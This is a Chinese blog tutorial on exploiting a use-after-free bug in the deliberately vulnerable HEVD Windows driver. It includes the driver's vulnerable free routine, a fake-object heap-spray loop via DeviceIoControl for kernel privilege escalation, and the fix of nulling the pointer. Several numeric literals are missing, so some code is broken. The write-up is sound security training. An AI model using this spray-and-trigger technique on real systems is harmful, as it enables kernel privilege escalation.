作者:huity
出处:https://www.cnblogs.com/huity35/p/11240997.html
版权:本文版权归作者所有。文章在博客园、看雪、个人博客同时发布。
转载:欢迎转载,但未经作者同意,必须保留此段声明;必须在文章中给出原文连接;否则必究法律责任。

0x00 前言

上一节研究了内核栈溢出相关问题,事实上利用已经成功了, 但是源码在vs环境下编译的驱动文件和利用程序,在最后返回时的堆栈平衡出现了问题,由于时间有限,暂时搁置,后面有时间将继续研究。
这一节学习释放后引用漏洞,即UAF.
实验环境:Win10专业版+VMware Workstation 15 Pro+Win7 x86 sp1
实验工具:VS2015+Windbg+KmdManager+DbgViewer

0x01 漏洞原理

UAF

Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况(引用Thunder J师傅的总结,到位):

①内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。
②内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。
③内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能会出现奇怪的问题。
一般Use After Free 漏洞主要是后两种。

Demo

#include <stdio.h>

#define size 32

int main(int argc, char **argv) {

    char *buf1;

    char *buf2;

    buf1 = (char *) malloc(size);

    printf("buf1:0x%p\n", buf1);

    free(buf1);

    // 分配 buf2 去“占坑”buf1 的内存位置

    buf2 = (char *) malloc(size);

    printf("buf2:0x%p\n\n", buf2);

    // 对buf2进行内存清零

    memset(buf2, , size);

    printf("buf2:%d\n", *buf2);

    // 重引用已释放的buf1指针,但却导致buf2值被篡改

    printf("==== Use After Free ===\n");

    strncpy(buf1, "hack", );

    printf("buf2:%s\n\n", buf2);

    free(buf2);

}
buf2 “占坑”了buf1 的内存位置,经过UAF后,buf2被成功篡改了。

程序分配和buf1大小相同的堆块buf2实现占坑,buf2分配到已经释放的buf1内存位置,但由于buf1指针依然有效,并且指向的内存数据是不可预测的,可能被堆管理器回收,也可能被其他数据占用填充,buf1指针称为悬挂指针,借助悬挂指针buf1将内存赋值为hack,导致buf2也被篡改为hack。

如果原有的漏洞程序引用到悬挂指针指向的数据用于执行指令,就会导致任意代码执行。

在通常的浏览器UAF漏洞中,都是某个C++对象被释放后重引用,假设程序存在UAF的漏洞,有个悬挂指针指向test对象,要实现漏洞利用,通过占坑方式覆盖test对象的虚表指针,虚表指针指向虚函数存放地址,现在让其指向恶意构造的shellcode,当程序再次引用到test对象就会导致任意代码执行。

分析

UAF漏洞中涉及许多驱动程序功能,我们将依次查看每一个,以提供适当的详细信息。

AllocateUaFObject

typedef void(*FunctionPointer)();

...

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL

{

    FunctionPointer Callback;

    CHAR Buffer[0x54];

} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;

...

NTSTATUS AllocateUaFObjectNonPagedPool(VOID){

    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PUSE_AFTER_FREE_NON_PAGED_POOL UseAfterFree = NULL;

    PAGED_CODE();

    __try

    {

        DbgPrint("[+] Allocating UaF Object\n");

        // Allocate Pool chunk

        UseAfterFree = (PUSE_AFTER_FREE_NON_PAGED_POOL)ExAllocatePoolWithTag(

            NonPagedPool,

            sizeof(USE_AFTER_FREE_NON_PAGED_POOL),

            (ULONG)POOL_TAG

        );

        if (!UseAfterFree)

        {

            // Unable to allocate Pool chunk

            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;

            return Status;

        }

        else

        {

            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));

            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));

            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(USE_AFTER_FREE_NON_PAGED_POOL));

            DbgPrint("[+] Pool Chunk: 0x%p\n", UseAfterFree);

        }

        // Fill the buffer with ASCII 'A'

        RtlFillMemory((PVOID)UseAfterFree->Buffer, sizeof(UseAfterFree->Buffer), 0x41);

        // Null terminate the char buffer

        UseAfterFree->Buffer[sizeof(UseAfterFree->Buffer) - ] = '\0';

        // Set the object Callback function

        UseAfterFree->Callback = &UaFObjectCallbackNonPagedPool;

        // Assign the address of UseAfterFree to a global variable

        g_UseAfterFreeObjectNonPagedPool = UseAfterFree;

        DbgPrint("[+] UseAfterFree Object: 0x%p\n", UseAfterFree);

        DbgPrint("[+] g_UseAfterFreeObjectNonPagedPool: 0x%p\n", g_UseAfterFreeObjectNonPagedPool);

        DbgPrint("[+] UseAfterFree->Callback: 0x%p\n", UseAfterFree->Callback);

    }

    __except (EXCEPTION_EXECUTE_HANDLER)

    {

        Status = GetExceptionCode();

        DbgPrint("[-] Exception Code: 0x%X\n", Status);

    }

    return Status;

}

该函数分配一个非分页的池块,用‘A’填充它,预先设置一个回调指针并添加一个空终止符。 IDA中的流程几乎相同,如下所示。 请注意,对象大小为0x58字节,池标记为“Hack”(小端对齐)。

FreeUaFObject

NTSTATUS

FreeUaFObjectNonPagedPool(

    VOID

)

{

    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PAGED_CODE();

    __try

    {

        if (g_UseAfterFreeObjectNonPagedPool)

        {

            DbgPrint("[+] Freeing UaF Object\n");

            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));

            DbgPrint("[+] Pool Chunk: 0x%p\n", g_UseAfterFreeObjectNonPagedPool);

#ifdef SECURE

            // Secure Note: This is secure because the developer is setting

            // 'g_UseAfterFreeObjectNonPagedPool' to NULL once the Pool chunk is being freed

            ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer

            g_UseAfterFreeObjectNonPagedPool = NULL;

#else

            // Vulnerability Note: This is a vanilla Use After Free vulnerability

            // because the developer is not setting 'g_UseAfterFreeObjectNonPagedPool' to NULL.

            // Hence, g_UseAfterFreeObjectNonPagedPool still holds the reference to stale pointer

            // (dangling pointer)

            ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);

#endif

            Status = STATUS_SUCCESS;

        }

    }

    __except (EXCEPTION_EXECUTE_HANDLER)

    {

        Status = GetExceptionCode();

        DbgPrint("[-] Exception Code: 0x%X\n", Status);

    }

    return Status;

}

相当直接,这可以通过引用标记值来释放池块。在安全版本下,这是安全的,而在不安全的版本中这是包含漏洞的函数,因为在释放对象后“g_UseAfterFreeObject”未设置为null,因此保留了过时的对象指针。

UseUaFObject

NTSTATUS UseUaFObjectNonPagedPool(VOID){

    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PAGED_CODE();

    __try

    {

        if (g_UseAfterFreeObjectNonPagedPool)

        {

            DbgPrint("[+] Using UaF Object\n");

            DbgPrint("[+] g_UseAfterFreeObjectNonPagedPool: 0x%p\n", g_UseAfterFreeObjectNonPagedPool);

            DbgPrint("[+] g_UseAfterFreeObjectNonPagedPool->Callback: 0x%p\n", g_UseAfterFreeObjectNonPagedPool->Callback);

            DbgPrint("[+] Calling Callback\n");

            if (g_UseAfterFreeObjectNonPagedPool->Callback)

            {

                g_UseAfterFreeObjectNonPagedPool->Callback();

            }

            Status = STATUS_SUCCESS;

        }

    }

    __except (EXCEPTION_EXECUTE_HANDLER)

    {

        Status = GetExceptionCode();

        DbgPrint("[-] Exception Code: 0x%X\n", Status);

    }

    return Status;

}
此函数由于UAF存在,则读入“g_UseAfterFreeObject”值并执行对象回调。

AllocateFakeObject

最终,经过一些谋划,我们找到这样一个驱动函数:它允许我们在非分页内存池上分配一个伪造的对象;更为方便的,该函数允许我们把对象分配到原本的UAF对象所在的位置上。
NTSTATUS

AllocateFakeObjectNonPagedPool( _In_ PFAKE_OBJECT_NON_PAGED_POOL UserFakeObject){

    NTSTATUS Status = STATUS_SUCCESS;

    PFAKE_OBJECT_NON_PAGED_POOL KernelFakeObject = NULL;

    PAGED_CODE();

    __try

    {

        DbgPrint("[+] Creating Fake Object\n");

        // Allocate Pool chunk

        KernelFakeObject = (PFAKE_OBJECT_NON_PAGED_POOL)ExAllocatePoolWithTag(

            NonPagedPool,

            sizeof(FAKE_OBJECT_NON_PAGED_POOL),

            (ULONG)POOL_TAG

        );

        if (!KernelFakeObject)

        {

            // Unable to allocate Pool chunk

            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;

            return Status;

        }

        else

        {

            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));

            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));

            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(FAKE_OBJECT_NON_PAGED_POOL));

            DbgPrint("[+] Pool Chunk: 0x%p\n", KernelFakeObject);

        }

        // Verify if the buffer resides in user mode

        ProbeForRead(

            (PVOID)UserFakeObject,

            sizeof(FAKE_OBJECT_NON_PAGED_POOL),

            (ULONG)__alignof(UCHAR)

        );

        // Copy the Fake structure to Pool chunk

        RtlCopyMemory(

            (PVOID)KernelFakeObject,

            (PVOID)UserFakeObject,

            sizeof(FAKE_OBJECT_NON_PAGED_POOL)

        );

        // Null terminate the char buffer

        KernelFakeObject->Buffer[sizeof(KernelFakeObject->Buffer) - ] = '\0';

        DbgPrint("[+] Fake Object: 0x%p\n", KernelFakeObject);

    }

    __except (EXCEPTION_EXECUTE_HANDLER)

    {

        Status = GetExceptionCode();

        DbgPrint("[-] Exception Code: 0x%X\n", Status);

    }

    return Status;

}
基本原理上面已经说明。
  1. 我们分配一个UAF对象。
  2. 我们释放掉UAF对象。
  3. 我们使用伪造的对象占坑释放掉的UAF对象内存。
  4. 我们用野指针调用UAF对象的callback函数,此时callback函数指针已经由伪造的对象来决定了。

0x02 漏洞利用

在Hacks Team提供的利用程序源码中,可以看到,其利用流程与我们上面总结的利用流程无二。
如果申请堆的大小和UAF中堆的大小相同,就可能申请到我们的这块内存,假如又提前构造好了这块内存中的数据,那么当最后释放的时候就会指向我们shellcode的位置,从而达到提取的效果。但问题是,我们电脑中有大量的空闲内存块,如果我们只构造一块假堆,我们并不能保证刚好能够用到我们的这块内存,所以我们就需要构造很多个这种堆,换句话说就是堆海战术吧,如果你看过0day安全这本书,里面说的堆喷射也就是这个原理。

利用代码,可以参考这里,下面只展示出核心部分:
//申请fake UAF对象

        for (i = ; i < 0x1000; i++)

        {

            DeviceIoControl(hFile,

                            HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT,

                            (LPVOID)FakeObject,//Ring3缓冲区

                            ,

                            NULL,

                            ,

                            &BytesReturned,

                            NULL);

        }

        OutputDebugString("****************Kernel Mode****************\n");

        DEBUG_INFO("\t\t\t[+] Freeing Reserve Objects\n");

        //释放剩余的对象

        FreeReserveObjects();

        DEBUG_MESSAGE("\t[+] Triggering Kernel Use After Free\n");

        OutputDebugString("****************Kernel Mode****************\n");

        //执行

        DeviceIoControl(hFile,

                        HACKSYS_EVD_IOCTL_USE_UAF_OBJECT,

                        NULL,

                        ,

                        NULL,

                        ,

                        &BytesReturned,

                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");

最终看到。提权成功,提权过程参考我的前一篇

0x03 漏洞防范

很明显在安全版本中,已给出防范方法,即释放后指控,防止悬挂指针的出现。
#ifdef SECURE

            // Secure Note: This is secure because the developer is setting

            // 'g_UseAfterFreeObjectNonPagedPool' to NULL once the Pool chunk is being freed

            ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer

            g_UseAfterFreeObjectNonPagedPool = NULL;

#else

            // Vulnerability Note: This is a vanilla Use After Free vulnerability

            // because the developer is not setting 'g_UseAfterFreeObjectNonPagedPool' to NULL.

            // Hence, g_UseAfterFreeObjectNonPagedPool still holds the reference to stale pointer

            // (dangling pointer)

            ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);

#endif

0x04 链接

[03] HEVD 内核漏洞之UAF的更多相关文章

  1. [02] HEVD 内核漏洞之栈溢出

    作者:huity出处:http://www.cnblogs.com/huity35/版权:本文版权归作者所有.文章在看雪.博客园.个人博客同时发布.转载:欢迎转载,但未经作者同意,必须保留此段声明:必 ...

  2. [04] HEVD 内核漏洞之IntegerOverflow

    作者:huity出处:https://www.cnblogs.com/huity35/p/11252574.html版权:本文版权归作者所有.文章在博客园.看雪.个人博客同时发布.转载:欢迎转载,但未 ...

  3. 内核漏洞学习—熟悉HEVD

    一直以来内核漏洞安全给很多人的印象就是:难,枯燥.但是内核安全是否掌握是衡量一个系统安全工程师水平的标准之一,也是安全从业人员都应该掌握的基本功.本文通过详细的实例带领读者走进内核安全的大门.难度系数 ...

  4. 【翻译】 Windows 内核漏洞学习—空指针解引用

    Windows Kernel Exploitation – NullPointer Dereference 原文地址:https://osandamalith.com/2017/06/22/windo ...

  5. Windows 内核漏洞学习—空指针解引用

    原标题:Windows Kernel Exploitation – NullPointer Dereference 原文地址:https://osandamalith.com/2017/06/22/w ...

  6. Android内核漏洞利用技术实战:环境搭建&栈溢出实战

    前言 Android的内核采用的是 Linux 内核,所以在Android内核中进行漏洞利用其实和在 一般的 x86平台下的 linux 内核中进行利用差不多.主要区别在于 Android 下使用的是 ...

  7. Linux kernel pwn notes(内核漏洞利用学习)

    前言 对这段时间学习的 linux 内核中的一些简单的利用技术做一个记录,如有差错,请见谅. 相关的文件 https://gitee.com/hac425/kernel_ctf 相关引用已在文中进行了 ...

  8. CVE-2014-0038内核漏洞原理与本地提权利用代码实现分析 作者:seteuid0

    关键字:CVE-2014-0038,内核漏洞,POC,利用代码,本地提权,提权,exploit,cve analysis, privilege escalation, cve, kernel vuln ...

  9. Fibratus:一款功能强大的Windows内核漏洞利用和跟踪工具

    今天给大家介绍的是一款名叫Fibratus的开源工具,广大研究人员可以使用这款功能强大的工具来进行Windows内核漏洞利用.挖掘与跟踪. Fibratus这款工具能够捕捉到绝大多数的Windows内 ...

随机推荐

  1. 使用VS2010再装VS2013不用再烦恼不兼容

    某些同事有时在开发过程中出现这么个问题,在使用js直接异步调用类库时,弹出错误类库不存在或者没有定义等,类似问题,这个时候可能你正在绞尽脑汁的去解决问题,明明问题不大,为什么安装VS2013后就不能打 ...

  2. DNS之主服务器正向区域部署流程

    正向区域:将域名解析为IP 搭建步骤 1)定义区域 2)编写区域解析库文件 3)添加记录 环境介绍 [root@dns ~]# cat /etc/centos-releaseCentOS releas ...

  3. SpringCloud Sleuth入门介绍

    案例代码:https://github.com/q279583842q/springcloud-e-book 一.Sleuth介绍   为什么要使用微服务跟踪?它解决了什么问题? 1.微服务的现状? ...

  4. Hadoop 学习之路(七)—— HDFS Java API

    一. 简介 想要使用HDFS API,需要导入依赖hadoop-client.如果是CDH版本的Hadoop,还需要额外指明其仓库地址: <?xml version="1.0" ...

  5. jdk9新特性之jShell

    jdk9还没研究完,结果jdk10都停止维护了. 最近回顾jdk9,发现了一个新特性--jShell. jdk9是在2017年的9月份发布的,这是我开始感觉入门java的时间.从jdk10开始就是半年 ...

  6. python 基础学习笔记(2)---字符串功能函数

    **上一篇写到了,基本的数据类型,今天重点来讲一下字符串的功能函数**回顾一下上篇的内容:一.int 整型,在python 3 中与long型合并 可以达到 -9223372036854775808- ...

  7. PHP中var_dump、&&和GLOBALS的爱恨纠缠

    var_dump函数:用来打印显示一个变量的内容与结构: &&:定义一个可变变量.php中,在定义变量时,需要在前面加上一个“&”符号,当加上两个“&&”符号时 ...

  8. java 泛型?和T的区别

    泛型三种:          [1]ArrayList<T> al=new ArrayList<T>();指定集合元素只能是T类型          [2]ArrayList& ...

  9. [网络协议]TCP粘包分析

    关于socket粘包,socket缓冲区设置的问题,记录一下: 一 .两个简单概念长连接与短连接: 长连接     Client方与Server方先建立通讯连接,连接建立后不断开, 然后再进行报文发送 ...

  10. c++2的幂次方

    c++2的幂次方 题目描述 任何一个正整数都可以用2的幂次方表示. 同时约定用括号来表示方次,即a的b次,可以表示为a(b). 由此可知,137可以表示为: 2(7)+2(3)+2(0) 进一步: ...